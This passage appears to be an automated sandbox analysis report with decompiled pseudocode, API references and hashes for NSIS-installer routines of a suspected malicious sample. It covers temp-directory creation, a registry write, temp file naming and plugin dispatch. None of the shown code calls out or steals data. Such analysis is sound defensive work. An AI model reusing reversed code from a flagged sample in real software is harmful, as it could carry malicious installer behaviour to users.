                                                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                                                        				_v36.Revision = 1;
                                                                                        				_v36.Control = 4;
                                                                                        				_v36.Dacl = 0x4083e8;
                                                                                        				_v16.nLength = 0xc;
                                                                                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                        				if(_t22 != 0) {
                                                                                        					L1:
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t23 = GetLastError();
                                                                                        				if(_t23 == 0xb7) {
                                                                                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					return GetLastError();
                                                                                        				}
                                                                                        				return _t23;
                                                                                        			}







                                                                                        0x00405a79
                                                                                        0x00405a7d
                                                                                        0x00405a80
                                                                                        0x00405a86
                                                                                        0x00405a8a
                                                                                        0x00405a8e
                                                                                        0x00405a96
                                                                                        0x00405a9d
                                                                                        0x00405aa3
                                                                                        0x00405aaa
                                                                                        0x00405ab1
                                                                                        0x00405ab9
                                                                                        0x00405abb
                                                                                        0x00000000
                                                                                        0x00405abb
                                                                                        0x00405ac5
                                                                                        0x00405acc
                                                                                        0x00405ae2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405ae4
                                                                                        0x00405ae8

                                                                                        APIs
                                                                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                        • GetLastError.KERNEL32 ref: 00405AC5
                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                        • GetLastError.KERNEL32 ref: 00405AE4
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 3449924974-3355392842
                                                                                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                        • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                        • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 875 6fe01817-6fe01856 call 6fe01bff 879 6fe01976-6fe01978 875->879 880 6fe0185c-6fe01860 875->880 881 6fe01862-6fe01868 call 6fe0243e 880->881 882 6fe01869-6fe01876 call 6fe02480 880->882 881->882 887 6fe018a6-6fe018ad 882->887 888 6fe01878-6fe0187d 882->888 889 6fe018cd-6fe018d1 887->889 890 6fe018af-6fe018cb call 6fe02655 call 6fe01654 call 6fe01312 GlobalFree 887->890 891 6fe01898-6fe0189b 888->891 892 6fe0187f-6fe01880 888->892 896 6fe018d3-6fe0191c call 6fe01666 call 6fe02655 889->896 897 6fe0191e-6fe01924 call 6fe02655 889->897 912 6fe01925-6fe01929 890->912 891->887 898 6fe0189d-6fe0189e call 6fe02e23 891->898 894 6fe01882-6fe01883 892->894 895 6fe01888-6fe01889 call 6fe02b98 892->895 900 6fe01890-6fe01896 call 6fe02810 894->900 901 6fe01885-6fe01886 894->901 908 6fe0188e 895->908 896->912 897->912 911 6fe018a3 898->911 916 6fe018a5 900->916 901->887 901->895 908->911 911->916 917 6fe01966-6fe0196d 912->917 918 6fe0192b-6fe01939 call 6fe02618 912->918 916->887 917->879 923 6fe0196f-6fe01970 GlobalFree 917->923 925 6fe01951-6fe01958 918->925 926 6fe0193b-6fe0193e 918->926 923->879 925->917 928 6fe0195a-6fe01965 call 6fe015dd 925->928 926->925 927 6fe01940-6fe01948 926->927 927->925 929 6fe0194a-6fe0194b FreeLibrary 927->929 928->917 929->925
                                                                                        C-Code - Quality: 88%
                                                                                        			E6FE01817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                        				void _v36;
                                                                                        				char _v136;
                                                                                        				struct HINSTANCE__* _t37;
                                                                                        				intOrPtr _t42;
                                                                                        				void* _t48;
                                                                                        				void* _t49;
                                                                                        				void* _t50;
                                                                                        				void* _t54;
                                                                                        				intOrPtr _t57;
                                                                                        				signed int _t61;
                                                                                        				signed int _t63;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
                                                                                        				void* _t72;
                                                                                        				void* _t76;
                                                                                        
                                                                                        				_t76 = __esi;
                                                                                        				_t68 = __edi;
                                                                                        				_t67 = __edx;
                                                                                        				 *0x6fe0506c = _a8;
                                                                                        				 *0x6fe05070 = _a16;
                                                                                        				 *0x6fe05074 = _a12;
                                                                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x6fe05048, E6FE01651);
                                                                                        				_push(1); // executed
                                                                                        				_t37 = E6FE01BFF(); // executed
                                                                                        				_t54 = _t37;
                                                                                        				if(_t54 == 0) {
                                                                                        					L28:
                                                                                        					return _t37;
                                                                                        				} else {
                                                                                        					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                        						E6FE0243E(_t54);
                                                                                        					}
                                                                                        					_push(_t54);
                                                                                        					E6FE02480(_t67);
                                                                                        					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                        					if(_t57 == 0xffffffff) {
                                                                                        						L14:
                                                                                        						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                        							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                        								_push(_t54);
                                                                                        								_t37 = E6FE02655();
                                                                                        							} else {
                                                                                        								_push(_t76);
                                                                                        								_push(_t68);
                                                                                        								_t61 = 8;
                                                                                        								_t13 = _t54 + 0x1018; // 0x1018
                                                                                        								memcpy( &_v36, _t13, _t61 << 2);
                                                                                        								_t42 = E6FE01666(_t54,  &_v136);
                                                                                        								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                        								_t18 = _t54 + 0x1018; // 0x1018
                                                                                        								_t72 = _t18;
                                                                                        								_push(_t54);
                                                                                        								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                        								 *_t72 = 4;
                                                                                        								E6FE02655();
                                                                                        								_t63 = 8;
                                                                                        								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                        							}
                                                                                        						} else {
                                                                                        							_push(_t54);
                                                                                        							E6FE02655();
                                                                                        							_t37 = GlobalFree(E6FE01312(E6FE01654(_t54)));
                                                                                        						}
                                                                                        						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                        							_t37 = E6FE02618(_t54);
                                                                                        							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                        								_t37 =  *(_t54 + 0x1008);
                                                                                        								if(_t37 != 0) {
                                                                                        									_t37 = FreeLibrary(_t37);
                                                                                        								}
                                                                                        							}
                                                                                        							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                        								_t37 = E6FE015DD( *0x6fe05068);
                                                                                        							}
                                                                                        						}
                                                                                        						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                        							goto L28;
                                                                                        						} else {
                                                                                        							return GlobalFree(_t54);
                                                                                        						}
                                                                                        					}
                                                                                        					_t48 =  *_t54;
                                                                                        					if(_t48 == 0) {
                                                                                        						if(_t57 != 1) {
                                                                                        							goto L14;
                                                                                        						}
                                                                                        						E6FE02E23(_t54);
                                                                                        						L12:
                                                                                        						_t54 = _t48;
                                                                                        						L13:
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					_t49 = _t48 - 1;
                                                                                        					if(_t49 == 0) {
                                                                                        						L8:
                                                                                        						_t48 = E6FE02B98(_t57, _t54); // executed
                                                                                        						goto L12;
                                                                                        					}
                                                                                        					_t50 = _t49 - 1;
                                                                                        					if(_t50 == 0) {
                                                                                        						E6FE02810(_t54);
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					if(_t50 != 1) {
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					goto L8;
                                                                                        				}
                                                                                        			}


















                                                                                        0x6fe01817
                                                                                        0x6fe01817
                                                                                        0x6fe01817
                                                                                        0x6fe01824
                                                                                        0x6fe0182c
                                                                                        0x6fe01839
                                                                                        0x6fe01847
                                                                                        0x6fe0184a
                                                                                        0x6fe0184c
                                                                                        0x6fe01851
                                                                                        0x6fe01856
                                                                                        0x6fe01978
                                                                                        0x6fe01978
                                                                                        0x6fe0185c
                                                                                        0x6fe01860
                                                                                        0x6fe01863
                                                                                        0x6fe01868
                                                                                        0x6fe01869
                                                                                        0x6fe0186a
                                                                                        0x6fe01870
                                                                                        0x6fe01876
                                                                                        0x6fe018a6
                                                                                        0x6fe018ad
                                                                                        0x6fe018d1
                                                                                        0x6fe0191e
                                                                                        0x6fe0191f
                                                                                        0x6fe018d3
                                                                                        0x6fe018d3
                                                                                        0x6fe018d4
                                                                                        0x6fe018dd
                                                                                        0x6fe018de
                                                                                        0x6fe018e8
                                                                                        0x6fe018eb
                                                                                        0x6fe018f0
                                                                                        0x6fe018f7
                                                                                        0x6fe018f7
                                                                                        0x6fe018fd
                                                                                        0x6fe018fe
                                                                                        0x6fe01904
                                                                                        0x6fe0190a
                                                                                        0x6fe01917
                                                                                        0x6fe01918
                                                                                        0x6fe0191b
                                                                                        0x6fe018af
                                                                                        0x6fe018af
                                                                                        0x6fe018b0
                                                                                        0x6fe018c5
                                                                                        0x6fe018c5
                                                                                        0x6fe01929
                                                                                        0x6fe0192c
                                                                                        0x6fe01939
                                                                                        0x6fe01940
                                                                                        0x6fe01948
                                                                                        0x6fe0194b
                                                                                        0x6fe0194b
                                                                                        0x6fe01948
                                                                                        0x6fe01958
                                                                                        0x6fe01960
                                                                                        0x6fe01965
                                                                                        0x6fe01958
                                                                                        0x6fe0196d
                                                                                        0x00000000
                                                                                        0x6fe0196f
                                                                                        0x00000000
                                                                                        0x6fe01970
                                                                                        0x6fe0196d
                                                                                        0x6fe0187a
                                                                                        0x6fe0187d
                                                                                        0x6fe0189b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe0189e
                                                                                        0x6fe018a3
                                                                                        0x6fe018a3
                                                                                        0x6fe018a5
                                                                                        0x00000000
                                                                                        0x6fe018a5
                                                                                        0x6fe0187f
                                                                                        0x6fe01880
                                                                                        0x6fe01888
                                                                                        0x6fe01889
                                                                                        0x00000000
                                                                                        0x6fe01889
                                                                                        0x6fe01882
                                                                                        0x6fe01883
                                                                                        0x6fe01891
                                                                                        0x00000000
                                                                                        0x6fe01891
                                                                                        0x6fe01886
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe01886

                                                                                        APIs
                                                                                          • Part of subcall function 6FE01BFF: GlobalFree.KERNEL32(?), ref: 6FE01E74
                                                                                          • Part of subcall function 6FE01BFF: GlobalFree.KERNEL32(?), ref: 6FE01E79
                                                                                          • Part of subcall function 6FE01BFF: GlobalFree.KERNEL32(?), ref: 6FE01E7E
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE018C5
                                                                                        • FreeLibrary.KERNEL32(?), ref: 6FE0194B
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE01970
                                                                                          • Part of subcall function 6FE0243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FE0246F
                                                                                          • Part of subcall function 6FE02810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FE01896,00000000), ref: 6FE028E0
                                                                                          • Part of subcall function 6FE01666: wsprintfW.USER32 ref: 6FE01694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3962662361-3916222277
                                                                                        • Opcode ID: 18cf3b44d70d864ee5c51cb6137e9f82faa22d936b324e6901c5f22831b70acc
                                                                                        • Instruction ID: 5d749dbebd74153e083ba141d9b5fac7daad1d0ee86c3f1b7a992a3b8b0672f7
                                                                                        • Opcode Fuzzy Hash: 18cf3b44d70d864ee5c51cb6137e9f82faa22d936b324e6901c5f22831b70acc
                                                                                        • Instruction Fuzzy Hash: 1641CE718003019ADB00BFB4D888BD93FA8AF0635CF64406EE915AE1D6DB7CA1B48B70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 83%
                                                                                        			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                        				void* _t20;
                                                                                        				void* _t21;
                                                                                        				int _t24;
                                                                                        				long _t25;
                                                                                        				int _t30;
                                                                                        				intOrPtr _t33;
                                                                                        				void* _t34;
                                                                                        				intOrPtr _t37;
                                                                                        				void* _t39;
                                                                                        				void* _t42;
                                                                                        
                                                                                        				_t42 = __eflags;
                                                                                        				_t33 = __edx;
                                                                                        				_t30 = __ebx;
                                                                                        				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                        				_t34 = __eax;
                                                                                        				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                        				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                        				_t20 = E00402DA6(0x11);
                                                                                        				 *(_t39 - 4) = 1;
                                                                                        				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                        				 *(_t39 + 8) = _t21;
                                                                                        				if(_t21 != __ebx) {
                                                                                        					_t24 = 0;
                                                                                        					if(_t37 == 1) {
                                                                                        						E00402DA6(0x23);
                                                                                        						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                                        					}
                                                                                        					if(_t37 == 4) {
                                                                                        						 *0x40b5f0 = E00402D84(3);
                                                                                        						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                        						_t24 = _t37;
                                                                                        					}
                                                                                        					if(_t37 == 3) {
                                                                                        						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
                                                                                        					}
                                                                                        					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                                        					if(_t25 == 0) {
                                                                                        						 *(_t39 - 4) = _t30;
                                                                                        					}
                                                                                        					_push( *(_t39 + 8));
                                                                                        					RegCloseKey(); // executed
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                        				return 0;
                                                                                        			}













                                                                                        0x0040248a
                                                                                        0x0040248a
                                                                                        0x0040248a
                                                                                        0x0040248a
                                                                                        0x0040248d
                                                                                        0x00402494
                                                                                        0x0040249e
                                                                                        0x004024a1
                                                                                        0x004024aa
                                                                                        0x004024b1
                                                                                        0x004024b8
                                                                                        0x004024bb
                                                                                        0x004024c1
                                                                                        0x004024cb
                                                                                        0x004024cf
                                                                                        0x004024da
                                                                                        0x004024da
                                                                                        0x004024e1
                                                                                        0x004024eb
                                                                                        0x004024f1
                                                                                        0x004024f4
                                                                                        0x004024f4
                                                                                        0x004024f8
                                                                                        0x00402504
                                                                                        0x00402504
                                                                                        0x00402515
                                                                                        0x0040251d
                                                                                        0x0040251f
                                                                                        0x0040251f
                                                                                        0x00402522
                                                                                        0x004025fd
                                                                                        0x004025fd
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiF917.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiF917.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiF917.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValuelstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiF917.tmp
                                                                                        • API String ID: 2655323295-2217646165
                                                                                        • Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                                                        • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                        • Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                                                        • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 53%
                                                                                        			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                                        				int _t11;
                                                                                        				signed char* _t12;
                                                                                        				long _t16;
                                                                                        				intOrPtr _t18;
                                                                                        				intOrPtr* _t21;
                                                                                        				signed int _t23;
                                                                                        
                                                                                        				E0040653D(0x42fa70, _a4);
                                                                                        				_t21 = E00405EB7(0x42fa70);
                                                                                        				if(_t21 != 0) {
                                                                                        					E004067C4(_t21);
                                                                                        					if(( *0x434f18 & 0x00000080) == 0) {
                                                                                        						L5:
                                                                                        						_t23 = _t21 - 0x42fa70 >> 1;
                                                                                        						while(1) {
                                                                                        							_t11 = lstrlenW(0x42fa70);
                                                                                        							_push(0x42fa70);
                                                                                        							if(_t11 <= _t23) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t12 = E00406873();
                                                                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                        								E00405E58(0x42fa70);
                                                                                        								continue;
                                                                                        							} else {
                                                                                        								goto L1;
                                                                                        							}
                                                                                        						}
                                                                                        						E00405E0C();
                                                                                        						_t16 = GetFileAttributesW(??); // executed
                                                                                        						return 0 | _t16 != 0xffffffff;
                                                                                        					}
                                                                                        					_t18 =  *_t21;
                                                                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                        						goto L1;
                                                                                        					} else {
                                                                                        						goto L5;
                                                                                        					}
                                                                                        				}
                                                                                        				L1:
                                                                                        				return 0;
                                                                                        			}









                                                                                        0x00405f20
                                                                                        0x00405f2b
                                                                                        0x00405f2f
                                                                                        0x00405f36
                                                                                        0x00405f42
                                                                                        0x00405f52
                                                                                        0x00405f54
                                                                                        0x00405f6c
                                                                                        0x00405f6d
                                                                                        0x00405f74
                                                                                        0x00405f75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405f58
                                                                                        0x00405f5f
                                                                                        0x00405f67
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405f5f
                                                                                        0x00405f77
                                                                                        0x00405f7d
                                                                                        0x00000000
                                                                                        0x00405f8b
                                                                                        0x00405f44
                                                                                        0x00405f4a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405f4a
                                                                                        0x00405f31
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 4Gw,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77473420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                        • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4Gw,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77473420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                        • GetFileAttributesW.KERNELBASE(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Gw,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77473420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                        • String ID: 4Gw$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 3248276644-3985625398
                                                                                        • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                        • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                        • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                        • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                        				intOrPtr _v8;
                                                                                        				short _v12;
                                                                                        				short _t12;
                                                                                        				intOrPtr _t13;
                                                                                        				signed int _t14;
                                                                                        				WCHAR* _t17;
                                                                                        				signed int _t19;
                                                                                        				signed short _t23;
                                                                                        				WCHAR* _t26;
                                                                                        
                                                                                        				_t26 = _a4;
                                                                                        				_t23 = 0x64;
                                                                                        				while(1) {
                                                                                        					_t12 =  *L"nsa"; // 0x73006e
                                                                                        					_t23 = _t23 - 1;
                                                                                        					_v12 = _t12;
                                                                                        					_t13 =  *0x40a57c; // 0x61
                                                                                        					_v8 = _t13;
                                                                                        					_t14 = GetTickCount();
                                                                                        					_t19 = 0x1a;
                                                                                        					_v8 = _v8 + _t14 % _t19;
                                                                                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                        					if(_t17 != 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t23 != 0) {
                                                                                        						continue;
                                                                                        					} else {
                                                                                        						 *_t26 =  *_t26 & _t23;
                                                                                        					}
                                                                                        					L4:
                                                                                        					return _t17;
                                                                                        				}
                                                                                        				_t17 = _t26;
                                                                                        				goto L4;
                                                                                        			}












                                                                                        0x00406062
                                                                                        0x00406068
                                                                                        0x00406069
                                                                                        0x00406069
                                                                                        0x0040606e
                                                                                        0x0040606f
                                                                                        0x00406072
                                                                                        0x00406077
                                                                                        0x0040607a
                                                                                        0x00406084
                                                                                        0x00406091
                                                                                        0x00406095
                                                                                        0x0040609d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060a1
                                                                                        0x00000000
                                                                                        0x004060a3
                                                                                        0x004060a3
                                                                                        0x004060a3
                                                                                        0x004060a6
                                                                                        0x004060a9
                                                                                        0x004060a9
                                                                                        0x004060ac
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040607A
                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-944333549
                                                                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                        • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                        • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 86%
                                                                                        			E004015C1(short __ebx, void* __eflags) {
